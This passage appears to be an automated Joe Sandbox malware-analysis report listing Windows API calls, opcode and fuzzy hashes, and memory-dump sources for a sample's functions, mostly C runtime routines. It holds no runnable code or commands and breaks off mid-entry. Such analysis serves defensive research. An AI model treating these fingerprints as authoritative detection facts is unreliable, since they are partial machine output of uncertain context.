                                                                                          • Opcode ID: 72d1a3e20dbb095a45ce38779ca038f0a90ba219c32a5a306cdc38d4a6be8f6b
                                                                                          • Instruction ID: 92c49f0ab6e878ac4ff5a0b34ba4adad9118df1d99996185adb6fe5f9f2fdca0
                                                                                          • Opcode Fuzzy Hash: 72d1a3e20dbb095a45ce38779ca038f0a90ba219c32a5a306cdc38d4a6be8f6b
                                                                                          • Instruction Fuzzy Hash: BCF08C36A00205DFD704DFA8E846B9D7BF1FB48720F00802AF5109B2E0C7794800CF40
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • EnumSystemLocalesW.KERNEL32(005FB110,00000001,?,?,?,005FAB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 005FB0FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 54f8475272b14ba5d49a258cdca92a21b338fedf272ab145d74edc5a5926d66c
                                                                                          • Instruction ID: deef51674325b33ae2315046f998c0a33ea1b3f61ee763924c5d58ea059b4eb6
                                                                                          • Opcode Fuzzy Hash: 54f8475272b14ba5d49a258cdca92a21b338fedf272ab145d74edc5a5926d66c
                                                                                          • Instruction Fuzzy Hash: B7F0E53A30020D97DB049F35DC59A7B7F99FFC1760F0A8058EB0A8B690CB799842C790
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,005F0A63,?,20001004,00000000,00000002,?,?,005EF971), ref: 005F6429
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 06fd1edb0206d00b0c663f4e7df67778c371d7877e3c39f76e87596892f1a93e
                                                                                          • Instruction ID: c78c2eed210d9ccbd948df1afefe0743f84417579d83e063cc9deda8ef12a783
                                                                                          • Opcode Fuzzy Hash: 06fd1edb0206d00b0c663f4e7df67778c371d7877e3c39f76e87596892f1a93e
                                                                                          • Instruction Fuzzy Hash: 7DE04F3154012DBBCF123F60DC09EBE7E16FF44750F048421FE0566161CB368921AAD1
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 005E9A6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: c064002bbe53c44a255696192ae6d49a022a6869e840264b7256a40b82f61d4c
                                                                                          • Instruction ID: 93c5a9d4995e75f63904cf586dc4c4a19a21a4c9d301eb21a701f4ea79951820
                                                                                          • Opcode Fuzzy Hash: c064002bbe53c44a255696192ae6d49a022a6869e840264b7256a40b82f61d4c
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 62d1fd4ffd7bc7a8a7d4b71f51782ec71dc49d757a6955cfaee8cb7b6744440b
                                                                                          • Instruction ID: 3b5b7f5cb26eb5df0b87d0afe0a42591287a0a8387615aebacb68df5d215057b
                                                                                          • Opcode Fuzzy Hash: 62d1fd4ffd7bc7a8a7d4b71f51782ec71dc49d757a6955cfaee8cb7b6744440b
                                                                                          • Instruction Fuzzy Hash: 9DA012302401128F93004F315904B0937D69502180308D4559010C4020D73040409F00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8278a685f3299ffc7fc03f55dd0c73398b8acbcba07770dc7837db0f3b5f4c8a
                                                                                          • Instruction ID: 2fcac6b486f30b2757756bf5f22dc632ee4fd66aba0ab1726ed9b63c01200b4a
                                                                                          • Opcode Fuzzy Hash: 8278a685f3299ffc7fc03f55dd0c73398b8acbcba07770dc7837db0f3b5f4c8a
                                                                                          • Instruction Fuzzy Hash: AED06C3A641A58AFC210CF49E440D41F7A9FB8AA70B158166EA4897B20C331F811CAE0
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(02DD05A8,02DD05A8,00000000,7FFFFFFF,?,006041BD,02DD05A8,02DD05A8,00000000,02DD05A8,?,?,?,?,02DD05A8,00000000), ref: 00604278
                                                                                          • __alloca_probe_16.LIBCMT ref: 00604333
                                                                                          • __alloca_probe_16.LIBCMT ref: 006043C2
                                                                                          • __freea.LIBCMT ref: 0060440D
                                                                                          • __freea.LIBCMT ref: 00604413
                                                                                          • __freea.LIBCMT ref: 00604449
                                                                                          • __freea.LIBCMT ref: 0060444F
                                                                                          • __freea.LIBCMT ref: 0060445F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 85535a1808d68c79740530c61c64b0f7d6fe7f6abf94eea5e07dc48d9acff5c1
                                                                                          • Instruction ID: 3c0a0d4cd4a117d043fc193601349a01ae03438224e71b6175ebbc53d39b86df
                                                                                          • Opcode Fuzzy Hash: 85535a1808d68c79740530c61c64b0f7d6fe7f6abf94eea5e07dc48d9acff5c1
                                                                                          • Instruction Fuzzy Hash: 9D71D2B2A8024A9BDF399E948C45BEF7BEBEF85350F280055FB14A72C1DE359D008790
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 6ce85c00b0e5e7211ca12d140c31bbb912b556b6b4e4b78a57cd94fe5b901a64
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: 63B16932A0125AAFDB159F28CC81BBE7FA5FF55350F244555EA04AF382DB78D901C7A0
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 005F4E6B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 005F50E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm$xf`
                                                                                          • API String ID: 2673424686-4120364529
                                                                                          • Opcode ID: bb5edc972cccdeef55e48156311ede0c7cbabdee48f51825fb9e4661e3853f2f
                                                                                          • Instruction ID: 0e0e6404609a50d4a88b7c85dda986c2ede798d1eb20a1915abee1e309db62b5
                                                                                          • Opcode Fuzzy Hash: bb5edc972cccdeef55e48156311ede0c7cbabdee48f51825fb9e4661e3853f2f
                                                                                          • Instruction Fuzzy Hash: 8CB1693180020E9FCF15DFA4C8499BFBBB9BF44310B10455AEB146B252EB79DA51CF92
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005EABE7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 005EABEF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005EAC78
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 005EACA3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 005EACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: 004fccb77f85478e03586593aedc812551a7b4c1426eb2bf536c44ce87e366ce
                                                                                          • Instruction ID: 6da32586bb7195d0469da79f2a3343ac19003b1568796e3c419885df7191c2e8
                                                                                          • Opcode Fuzzy Hash: 004fccb77f85478e03586593aedc812551a7b4c1426eb2bf536c44ce87e366ce
                                                                                          • Instruction Fuzzy Hash: 97410330A0025A9BCF15DF39C885AAE7FA2BF41324F248155F9589B392D735BE41CB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ad31e734313e7a9249cac7ad8c6a5eef9bccd0350ba930262443024763d1882
                                                                                          • Instruction ID: c2fa8e955e28bbee1fd9e6bb43a9e3f773a07c072df105720d3ec89f929f0797
                                                                                          • Opcode Fuzzy Hash: 6ad31e734313e7a9249cac7ad8c6a5eef9bccd0350ba930262443024763d1882
                                                                                          • Instruction Fuzzy Hash: 40B12470A4425AAFDB09DF98C854BFFBBBABF49301F144188E5019B3D2C7709A42CB64
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,005F4464,005EA97D,005E9BD4), ref: 005F447B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F4489
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F44A2
                                                                                          • SetLastError.KERNEL32(00000000,005F4464,005EA97D,005E9BD4), ref: 005F44F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 0d596911b59a9c047910c23468b3d5e36a4a7e61d0bc7b61805c63a7a278ff42
                                                                                          • Instruction ID: 74bde17e953e65bb42660ce8308490383e767382793504e121a66b076526158d
                                                                                          • Opcode Fuzzy Hash: 0d596911b59a9c047910c23468b3d5e36a4a7e61d0bc7b61805c63a7a278ff42
                                                                                          • Instruction Fuzzy Hash: 0001F53210921A5DFF242774BC8DA7B2F95FB81774B24562AF710A54F1EF594C415680
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,843561DF,?,?,00000000,00605684,000000FF,?,005EF2B9,005EF1A0,?,005EF355,00000000), ref: 005EF22D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EF23F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00605684,000000FF,?,005EF2B9,005EF1A0,?,005EF355,00000000), ref: 005EF261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 9923212948d01b4b10cc4d8a39d531265136050e66f0b67739d21bf28971f330
                                                                                          • Instruction ID: 0d19ee2146e0fdf68ab9bd2fbd3958334147df7311f1c8c1f1d2bd18c3cc7b11
                                                                                          • Opcode Fuzzy Hash: 9923212948d01b4b10cc4d8a39d531265136050e66f0b67739d21bf28971f330
                                                                                          • Instruction Fuzzy Hash: 0C01A735990665AFDB058B50DC09BAF7BBAFB04B11F054625F911A22D0DBB59900CB80
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005E77F9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 005E7804
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 005E7872
                                                                                            • Part of subcall function 005E76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005E7707
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 005E781F
                                                                                          • _Yarn.LIBCPMT ref: 005E7835
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: 73559966a19406a96356916272aa543b2ad16e8b47ddd21919bbdaab389b301d
                                                                                          • Instruction ID: 127051f0acf59492f958e44fb61ded7945e80b521dec705d460c572fcbb05007
                                                                                          • Opcode Fuzzy Hash: 73559966a19406a96356916272aa543b2ad16e8b47ddd21919bbdaab389b301d
                                                                                          • Instruction Fuzzy Hash: FA01B1B5A445659BCB0DEF21D8595BD7F63FFD9340B08400AE94257391DF345E02CB91
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005FF74C,00000000,?,00611E20,?,?,?,005FF683,00000004,InitializeCriticalSectionEx,006090D4,006090DC), ref: 005FF6BD
                                                                                          • GetLastError.KERNEL32(?,005FF74C,00000000,?,00611E20,?,?,?,005FF683,00000004,InitializeCriticalSectionEx,006090D4,006090DC,00000000,?,005F539C), ref: 005FF6C7
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005FF6EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: 9458986fe14a6397e8bd588a29570af377867a1acb15919e2e470f5876aba73e
                                                                                          • Instruction ID: 17dcdea6805f37455ae7a3c6c090ebe7025b4a4e1a35e004e175c42ba4028e9b
                                                                                          • Opcode Fuzzy Hash: 9458986fe14a6397e8bd588a29570af377867a1acb15919e2e470f5876aba73e
                                                                                          • Instruction Fuzzy Hash: FBE012302C0209B6EB201B60DC0AB693E59AF00B90F244430FA0CE44F0EFA799509684
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(843561DF,00000000,00000000,?), ref: 005FD7B1
                                                                                            • Part of subcall function 005F5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005F6FD5,?,00000000,-00000008), ref: 005F5862
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005FDA03
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005FDA49
                                                                                          • GetLastError.KERNEL32 ref: 005FDAEC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 6cf0c52d3e73f08fcc0ed1aeb5713de87f39ae0844585a1f9f0ccf958d64b0df
                                                                                          • Instruction ID: 11cee9baf538e2cc5ce4bb32fa1fc46e1a1ebfec583e0348e2ad5c08e0a20285
                                                                                          • Opcode Fuzzy Hash: 6cf0c52d3e73f08fcc0ed1aeb5713de87f39ae0844585a1f9f0ccf958d64b0df
                                                                                          • Instruction Fuzzy Hash: D2D19AB5D042499FCF15CFA8C880AEDBFB6FF48300F28456AE656EB351D634A941CB64
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
